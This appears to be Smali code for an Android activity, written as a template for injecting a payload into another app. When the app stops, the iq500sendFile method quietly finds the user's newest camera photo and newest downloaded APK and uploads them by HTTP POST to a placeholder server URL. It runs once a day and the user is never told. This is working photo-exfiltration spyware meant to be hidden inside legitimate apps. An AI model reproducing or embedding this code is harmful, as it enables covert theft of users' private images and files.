.method protected onStop()V
    .registers 4
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 45
    move-object v0, p0

    move-object v2, v0

    invoke-super {v2}, Landroid/app/Activity;->onStop()V

    .line 46
    move-object v2, v0

    invoke-direct {v2}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->iq500sendFile()V

    return-void
.end method

.method private iq500sendFile()V
    .registers 45
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 54
    move-object/from16 v2, p0

    const/16 v34, 0x0

    :try_start_4
    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v4, v34

    .line 55
    new-instance v34, Ljava/util/Date;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Ljava/util/Date;-><init>()V

    move-object/from16 v5, v34

    .line 56
    move-object/from16 v34, v5

    invoke-virtual/range {v34 .. v34}, Ljava/util/Date;->getTime()J

    move-result-wide v34

    move-wide/from16 v6, v34

    .line 57
    move-object/from16 v34, v2

    const-string v35, "loadpref"

    const/16 v36, 0x0

    invoke-virtual/range {v34 .. v36}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;

    move-result-object v34

    move-object/from16 v8, v34

    .line 58
    move-object/from16 v34, v8

    invoke-interface/range {v34 .. v34}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;

    move-result-object v34

    move-object/from16 v9, v34

    .line 60
    move-object/from16 v34, v8

    const-string v35, "lastUpload"

    const/16 v36, 0x0

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    invoke-interface/range {v34 .. v37}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J

    move-result-wide v34

    move-wide/from16 v10, v34

    .line 62
    move-wide/from16 v34, v10

    const/16 v36, 0x0

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    cmp-long v34, v34, v36

    if-eqz v34, :cond_76

    move-wide/from16 v34, v6

    move-wide/from16 v36, v10

    sub-long v34, v34, v36

    const v36, 0x5265c00

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    cmp-long v34, v34, v36

    if-ltz v34, :cond_a1

    .line 64
    :cond_76
    move-object/from16 v34, v9

    const-string v35, "lastUpload"

    move-wide/from16 v36, v6

    invoke-interface/range {v34 .. v37}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;

    move-result-object v34

    .line 65
    move-object/from16 v34, v9

    invoke-interface/range {v34 .. v34}, Landroid/content/SharedPreferences$Editor;->commit()Z

    move-result v34

    .line 66
    const/16 v34, 0x1

    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v4, v34

    .line 70
    :cond_a1
    move-object/from16 v34, v4

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z
    :try_end_a8
    .catch Ljava/lang/Exception; {:try_start_4 .. :try_end_a8} :catch_564

    move-result v34

    if-eqz v34, :cond_24f

    .line 74
    :try_start_ab
    new-instance v34, Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Landroid/os/StrictMode$ThreadPolicy$Builder;-><init>()V

    invoke-virtual/range {v34 .. v34}, Landroid/os/StrictMode$ThreadPolicy$Builder;->permitAll()Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-result-object v34

    invoke-virtual/range {v34 .. v34}, Landroid/os/StrictMode$ThreadPolicy$Builder;->build()Landroid/os/StrictMode$ThreadPolicy;

    move-result-object v34

    move-object/from16 v12, v34

    .line 75
    move-object/from16 v34, v12

    invoke-static/range {v34 .. v34}, Landroid/os/StrictMode;->setThreadPolicy(Landroid/os/StrictMode$ThreadPolicy;)V

    .line 78
    const-string v34, "/sdcard/DCIM/Camera/"

    move-object/from16 v13, v34

    .line 79
    const-string v34, "/sdcard/Download/"

    move-object/from16 v14, v34

    .line 81
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v13

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v15, v34

    .line 82
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v14

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v16, v34

    .line 84
    move-object/from16 v34, v15

    invoke-virtual/range {v34 .. v34}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v34

    move-object/from16 v17, v34

    .line 85
    move-object/from16 v34, v16

    invoke-virtual/range {v34 .. v34}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v34

    move-object/from16 v18, v34

    .line 88
    const-string v34, ""

    move-object/from16 v19, v34

    .line 89
    const-string v34, ""

    move-object/from16 v20, v34

    .line 91
    const/16 v34, 0x0

    move/from16 v21, v34

    :goto_107
    move/from16 v34, v21

    move-object/from16 v35, v17

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    move/from16 v0, v34

    move/from16 v1, v35

    if-lt v0, v1, :cond_250

    .line 109
    const/16 v34, 0x0

    move/from16 v21, v34

    :goto_11a
    move/from16 v34, v21

    move-object/from16 v35, v18

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    move/from16 v0, v34

    move/from16 v1, v35

    if-lt v0, v1, :cond_3d3

    .line 123
    move-object/from16 v34, v19

    const-string v35, "///n"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v34

    move-object/from16 v21, v34

    .line 124
    move-object/from16 v34, v20

    const-string v35, "///n"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v34

    move-object/from16 v22, v34

    .line 125
    const-string v34, ""

    move-object/from16 v23, v34

    .line 126
    const-string v34, ""

    move-object/from16 v24, v34

    .line 127
    const/16 v34, 0x0

    move/from16 v0, v34

    int-to-long v0, v0

    move-wide/from16 v34, v0

    move-wide/from16 v25, v34

    .line 128
    const/16 v34, 0x0

    move/from16 v0, v34

    int-to-long v0, v0

    move-wide/from16 v34, v0

    move-wide/from16 v27, v34

    .line 130
    const/16 v34, 0x0

    move/from16 v29, v34

    :goto_15b
    move/from16 v34, v29

    move-object/from16 v35, v21

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    move/from16 v0, v34

    move/from16 v1, v35

    if-lt v0, v1, :cond_4e4

    .line 138
    const/16 v34, 0x0

    move/from16 v29, v34

    :goto_16e
    move/from16 v34, v29

    move-object/from16 v35, v22

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    move/from16 v0, v34

    move/from16 v1, v35

    if-lt v0, v1, :cond_519

    .line 147
    move-object/from16 v34, v23

    const-string v35, ""

    move-object/from16 v0, v34

    move-object/from16 v1, v35

    if-eq v0, v1, :cond_1e6

    .line 150
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v23

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v29, v34

    .line 153
    new-instance v34, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v29

    const-string v37, "binary/octet-stream"

    invoke-direct/range {v35 .. v37}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v30, v34

    .line 156
    new-instance v34, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    const-string v36, "http://localhost/file.php"

    invoke-direct/range {v35 .. v36}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v31, v34

    .line 159
    move-object/from16 v34, v31

    move-object/from16 v35, v30

    invoke-virtual/range {v34 .. v35}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 160
    move-object/from16 v34, v30

    const-string v35, "binary/octet-stream"

    invoke-virtual/range {v34 .. v35}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 163
    move-object/from16 v34, v31

    const-string v35, "lmod"

    move-wide/from16 v36, v25

    invoke-static/range {v36 .. v37}, Ljava/lang/String;->valueOf(J)Ljava/lang/String;

    move-result-object v36

    invoke-virtual/range {v34 .. v36}, Lorg/apache/http/client/methods/HttpPost;->setHeader(Ljava/lang/String;Ljava/lang/String;)V

    .line 166
    new-instance v34, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v32, v34

    .line 167
    move-object/from16 v34, v32

    move-object/from16 v35, v31

    invoke-interface/range {v34 .. v35}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v34

    .line 171
    :cond_1e6
    move-object/from16 v34, v24

    const-string v35, ""

    move-object/from16 v0, v34

    move-object/from16 v1, v35

    if-eq v0, v1, :cond_24f

    .line 173
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v24

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v29, v34

    .line 174
    new-instance v34, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    move-object/from16 v36, v29

    const-string v37, "binary/octet-stream"

    invoke-direct/range {v35 .. v37}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v30, v34

    .line 175
    new-instance v34, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    const-string v36, "http://localhost/file.php"

    invoke-direct/range {v35 .. v36}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v31, v34

    .line 177
    move-object/from16 v34, v31

    move-object/from16 v35, v30

    invoke-virtual/range {v34 .. v35}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 178
    move-object/from16 v34, v30

    const-string v35, "binary/octet-stream"

    invoke-virtual/range {v34 .. v35}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 179
    move-object/from16 v34, v31

    const-string v35, "fname"

    move-object/from16 v36, v29

    invoke-virtual/range {v36 .. v36}, Ljava/io/File;->getName()Ljava/lang/String;

    move-result-object v36

    invoke-virtual/range {v34 .. v36}, Lorg/apache/http/client/methods/HttpPost;->setHeader(Ljava/lang/String;Ljava/lang/String;)V

    .line 180
    new-instance v34, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v32, v34

    .line 181
    move-object/from16 v34, v32

    move-object/from16 v35, v31

    invoke-interface/range {v34 .. v35}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v34

    .line 193
    :cond_24f
    :goto_24f
    return-void

    .line 93
    :cond_250
    move-object/from16 v34, v17

    move/from16 v35, v21

    aget-object v34, v34, v35

    const-string v35, ".jpg"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v34

    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v22, v34

    .line 94
    move-object/from16 v34, v17

    move/from16 v35, v21

    aget-object v34, v34, v35

    const-string v35, ".jpeg"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v34

    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v23, v34

    .line 95
    move-object/from16 v34, v17

    move/from16 v35, v21

    aget-object v34, v34, v35

    const-string v35, ".png"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v34

    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v24, v34

    .line 96
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    new-instance v36, Ljava/lang/StringBuffer;

    move-object/from16 v42, v36

    move-object/from16 v36, v42

    move-object/from16 v37, v42

    invoke-direct/range {v37 .. v37}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v37, v13

    invoke-virtual/range {v36 .. v37}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v36

    move-object/from16 v37, v17

    move/from16 v38, v21

    aget-object v37, v37, v38

    invoke-virtual/range {v36 .. v37}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v36

    invoke-virtual/range {v36 .. v36}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v36

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v34 .. v34}, Ljava/io/File;->length()J

    move-result-wide v34

    const/16 v36, 0x400

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    div-long v34, v34, v36

    const/16 v36, 0x400

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    div-long v34, v34, v36

    const/16 v36, 0xa

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    cmp-long v34, v34, v36

    if-lez v34, :cond_3cf

    const/16 v34, 0x0

    :goto_30c
    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v25, v34

    .line 98
    move-object/from16 v34, v22

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-eqz v34, :cond_339

    move-object/from16 v34, v25

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-nez v34, :cond_361

    :cond_339
    move-object/from16 v34, v23

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-eqz v34, :cond_34d

    move-object/from16 v34, v25

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-nez v34, :cond_361

    :cond_34d
    move-object/from16 v34, v24

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-eqz v34, :cond_3cb

    move-object/from16 v34, v25

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-eqz v34, :cond_3cb

    .line 100
    :cond_361
    new-instance v34, Ljava/lang/StringBuffer;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v35, v19

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    new-instance v35, Ljava/lang/StringBuffer;

    move-object/from16 v42, v35

    move-object/from16 v35, v42

    move-object/from16 v36, v42

    invoke-direct/range {v36 .. v36}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v36, v13

    invoke-virtual/range {v35 .. v36}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v35

    move-object/from16 v36, v17

    move/from16 v37, v21

    aget-object v36, v36, v37

    invoke-virtual/range {v35 .. v36}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v35

    invoke-virtual/range {v35 .. v35}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v35

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    invoke-virtual/range {v34 .. v34}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v34

    move-object/from16 v19, v34

    .line 102
    move/from16 v34, v21

    move-object/from16 v35, v17

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    const/16 v36, 0x1

    add-int/lit8 v35, v35, -0x1

    move/from16 v0, v34

    move/from16 v1, v35

    if-ge v0, v1, :cond_3cb

    .line 103
    new-instance v34, Ljava/lang/StringBuffer;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v35, v19

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    const-string v35, "///n"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    invoke-virtual/range {v34 .. v34}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v34

    move-object/from16 v19, v34

    .line 91
    :cond_3cb
    add-int/lit8 v21, v21, 0x1

    goto/16 :goto_107

    .line 96
    :cond_3cf
    const/16 v34, 0x1

    goto/16 :goto_30c

    .line 111
    :cond_3d3
    move-object/from16 v34, v18

    move/from16 v35, v21

    aget-object v34, v34, v35

    const-string v35, ".apk"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v34

    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v22, v34

    .line 112
    new-instance v34, Ljava/io/File;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    new-instance v36, Ljava/lang/StringBuffer;

    move-object/from16 v42, v36

    move-object/from16 v36, v42

    move-object/from16 v37, v42

    invoke-direct/range {v37 .. v37}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v37, v14

    invoke-virtual/range {v36 .. v37}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v36

    move-object/from16 v37, v18

    move/from16 v38, v21

    aget-object v37, v37, v38

    invoke-virtual/range {v36 .. v37}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v36

    invoke-virtual/range {v36 .. v36}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v36

    invoke-direct/range {v35 .. v36}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v34 .. v34}, Ljava/io/File;->length()J

    move-result-wide v34

    const/16 v36, 0x400

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    div-long v34, v34, v36

    const/16 v36, 0x400

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    div-long v34, v34, v36

    const/16 v36, 0x5

    move/from16 v0, v36

    int-to-long v0, v0

    move-wide/from16 v36, v0

    cmp-long v34, v34, v36

    if-lez v34, :cond_4e0

    const/16 v34, 0x0

    :goto_445
    new-instance v35, Ljava/lang/Boolean;

    move/from16 v42, v34

    move-object/from16 v43, v35

    move-object/from16 v34, v43

    move/from16 v35, v42

    move-object/from16 v36, v43

    move/from16 v42, v35

    move-object/from16 v43, v36

    move-object/from16 v35, v43

    move/from16 v36, v42

    invoke-direct/range {v35 .. v36}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v23, v34

    .line 114
    move-object/from16 v34, v22

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-nez v34, :cond_4dc

    move-object/from16 v34, v23

    check-cast v34, Ljava/lang/Boolean;

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v34

    if-eqz v34, :cond_4dc

    .line 116
    new-instance v34, Ljava/lang/StringBuffer;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v35, v20

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    new-instance v35, Ljava/lang/StringBuffer;

    move-object/from16 v42, v35

    move-object/from16 v35, v42

    move-object/from16 v36, v42

    invoke-direct/range {v36 .. v36}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v36, v14

    invoke-virtual/range {v35 .. v36}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v35

    move-object/from16 v36, v18

    move/from16 v37, v21

    aget-object v36, v36, v37

    invoke-virtual/range {v35 .. v36}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v35

    invoke-virtual/range {v35 .. v35}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v35

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    invoke-virtual/range {v34 .. v34}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v34

    move-object/from16 v20, v34

    .line 118
    move/from16 v34, v21

    move-object/from16 v35, v18

    move-object/from16 v0, v35

    array-length v0, v0

    move/from16 v35, v0

    const/16 v36, 0x1

    add-int/lit8 v35, v35, -0x1

    move/from16 v0, v34

    move/from16 v1, v35

    if-ge v0, v1, :cond_4dc

    .line 119
    new-instance v34, Ljava/lang/StringBuffer;

    move-object/from16 v42, v34

    move-object/from16 v34, v42

    move-object/from16 v35, v42

    invoke-direct/range {v35 .. v35}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v35, v20

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    const-string v35, "///n"

    invoke-virtual/range {v34 .. v35}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v34

    invoke-virtual/range {v34 .. v34}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v34

    move-object/from16 v20, v34

    .line 109
    :cond_4dc
    add-int/lit8 v21, v21, 0x1

    goto/16 :goto_11a

    .line 112
    :cond_4e0
    const/16 v34, 0x1

    goto/16 :goto_445

    .line 132
    :cond_4e4
    move-wide/from16 v34, v25

    move-wide/from16 v30, v34

    .line 133
    move-wide/from16 v34, v25

    new-instance v36, Ljava/io/File;

    move-object/from16 v42, v36

    move-object/from16 v36, v42

    move-object/from16 v37, v42

    move-object/from16 v38, v21

    move/from16 v39, v29

    aget-object v38, v38, v39

    invoke-direct/range {v37 .. v38}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v36 .. v36}, Ljava/io/File;->lastModified()J

    move-result-wide v36

    invoke-static/range {v34 .. v37}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v34

    move-wide/from16 v25, v34

    .line 134
    move-wide/from16 v34, v30

    move-wide/from16 v36, v25

    cmp-long v34, v34, v36

    if-eqz v34, :cond_515

    .line 135
    move-object/from16 v34, v21

    move/from16 v35, v29

    aget-object v34, v34, v35

    move-object/from16 v23, v34

    .line 130
    :cond_515
    add-int/lit8 v29, v29, 0x1

    goto/16 :goto_15b

    .line 140
    :cond_519
    move-wide/from16 v34, v27

    move-wide/from16 v30, v34

    .line 141
    move-wide/from16 v34, v27

    new-instance v36, Ljava/io/File;

    move-object/from16 v42, v36

    move-object/from16 v36, v42

    move-object/from16 v37, v42

    move-object/from16 v38, v22

    move/from16 v39, v29

    aget-object v38, v38, v39

    invoke-direct/range {v37 .. v38}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v36 .. v36}, Ljava/io/File;->lastModified()J

    move-result-wide v36

    invoke-static/range {v34 .. v37}, Ljava/lang/Math;->max(JJ)J

    move-result-wide v34

    move-wide/from16 v27, v34

    .line 142
    move-wide/from16 v34, v30

    move-wide/from16 v36, v27

    cmp-long v34, v34, v36

    if-eqz v34, :cond_54a

    .line 143
    move-object/from16 v34, v22

    move/from16 v35, v29

    aget-object v34, v34, v35
    :try_end_548
    .catch Ljava/lang/Exception; {:try_start_ab .. :try_end_548} :catch_54e

    move-object/from16 v24, v34

    .line 138
    :cond_54a
    add-int/lit8 v29, v29, 0x1

    goto/16 :goto_16e

    .line 181
    :catch_54e
    move-exception v34

    move-object/from16 v12, v34

    .line 187
    move-object/from16 v34, v12

    :try_start_553
    invoke-virtual/range {v34 .. v34}, Ljava/lang/Exception;->printStackTrace()V

    .line 188
    const-string v34, "iq500"

    move-object/from16 v35, v12

    invoke-virtual/range {v35 .. v35}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v35

    invoke-static/range {v34 .. v35}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    :try_end_561
    .catch Ljava/lang/Exception; {:try_start_553 .. :try_end_561} :catch_564

    move-result v34

    goto/16 :goto_24f

    :catch_564
    move-exception v34

    move-object/from16 v4, v34

    .line 192
    move-object/from16 v34, v4

    invoke-virtual/range {v34 .. v34}, Ljava/lang/Exception;->printStackTrace()V

    .line 193
    const-string v34, "iq500"

    move-object/from16 v35, v4

    invoke-virtual/range {v35 .. v35}, Ljava/lang/Exception;->toString()Ljava/lang/String;

    move-result-object v35

    invoke-static/range {v34 .. v35}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I

    move-result v34

    goto/16 :goto_24f
.end method

